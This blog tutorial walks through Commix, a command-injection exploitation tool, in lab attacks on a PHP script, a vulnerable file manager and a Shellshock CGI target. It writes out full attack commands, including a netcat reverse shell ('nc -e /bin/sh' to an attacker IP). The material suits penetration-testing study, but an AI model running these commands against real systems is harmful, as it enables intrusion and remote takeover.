Commix – an automated tool for command injection 2023
This article is about Commix – an automated tool for command injection.
Introduction to Commix:
Commix, short for [comm]and [i]njection e[x]politer, is a tool for finding and exploiting command injection vulnerabilities in a given parameter. This article explains some of the main features of this tool by targeting some vulnerable applications. The use of this tool is well documented for those with some basic knowledge of command usage.
Commix settings
Download Commix by cloning the Git repository:
git clone [download]
I downloaded it and installed it on Kali Linux where we will run all our demos in this article.
I found this tool very easy to use. We can enter the following command to get help.
python Commix.py –h
Command injection
This section shows the usage and various options available with Commix. I wrote some scripts and took one target application from exploit-db.com to demonstrate different scenarios.
Example 1: Simple insertion of the php command
Let’s start with a simple PHP command injection vulnerability to get started with this tool. Below is the script I hosted on my target server.
This can be accessed from the attacking machine using the following URL:
http://10.1.1.8/cmdinj/vulnerable.php?cmd=[some command]
Let’s see Commix in action:
Run the following command to get started with basic command insertion.
python Commix.py –url=”http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE”
Note that I replaced the value of the “cmd” parameter with “INJECT_HERE”. This is how Commix understands the target parameter to be tested. Now Commix starts performing tests for this parameter and provides us with an interactive shell as shown below.
The shell obtained in this example is not stable to execute some commands. You can observe the output of “id” command.
This is working fine when tried from a browser.
There are multiple ways in Commix to get around this. I just used Commix’s –os-cmd option to get an nc reverse shell from the target machine.
Listen for incoming connections on port 4444 as shown below.
Now, type in the following command with Commix.
python Commix.py –url=”http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE” –os-cmd=”nc -e /bin/sh 10.1.1.9 4444″
Now, let’s look at the Netcat shell. We should be greeted with a new interactive shell where we can run the commands.
Note: If Netcat is not installed on the target machine, which is often the case; we can use other techniques such Python/Perl reverse shell.
Also read:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
Example 2: PHP File Manager 0.9.8 from www.exploit-db.com
The next example is to show another feature of Commix that can be used to take advantage of command insertion.
The vulnerable application can be downloaded from the link below.
https://www.exploit-db.com/exploits/37709/
Let us understand the application and manually find command injection vulnerabilities.
Host the downloaded application on the server and run it from the browser.
Click “Enter” button and you should be landed in the following page.
The command injection vulnerability resides in “Execute Command” functionality of this page. When we click this button, it asks for a command to enter.
Enter an Operating System command as shown above and you should see the following link which is vulnerable to Command Injection.
Now, let’s see how we can use Commix tool to identify and exploit the above application.
Type in the following command.
python Commix.py –url=”http://10.1.1.8/phpfilemanager/index.php?action=6¤t_dir=/var/www/phpfilemanager/&cmd=INJECT_HERE”
The above step has failed for some reason. After exploring a while, I found that the target application is sending cookies to the server after clicking the button “Enter”.
Our injection attempt with Commix failed, as cookies were not provided. Commix has support for cookies as well. We can provide cookies using “—cookies” option. Let us intercept the request and provide cookies to Commix. This is shown below.
This time, our attempt was successful and we got a shell as shown below.
Example 3: shellshock exploitation made easier
Personally, I liked the shellshock exploitation feature of Commix. If you’re new to shellshock, please check out the following articles I’ve written before.
/practical-shock-exploitation-part-1/
/practical-shell-exploitation-part-2/
These articles show the innards of shellshock and how we can set up our own lab to practice using shellshock. The Commix tool makes it easy to exploit the Shellshock vulnerability. I’m using the same setup I used in the above articles to demonstrate Commix’s shellshock feature.
Below is the destination URL.
http://10.1.1.8/cgi-bin/vulnerable.sh
Run the following command with the “–shellshock” option to exploit the target.
python Commix.py –url=”http://10.1.1.8/cgi-bin/vulnerable.sh” –shellshock
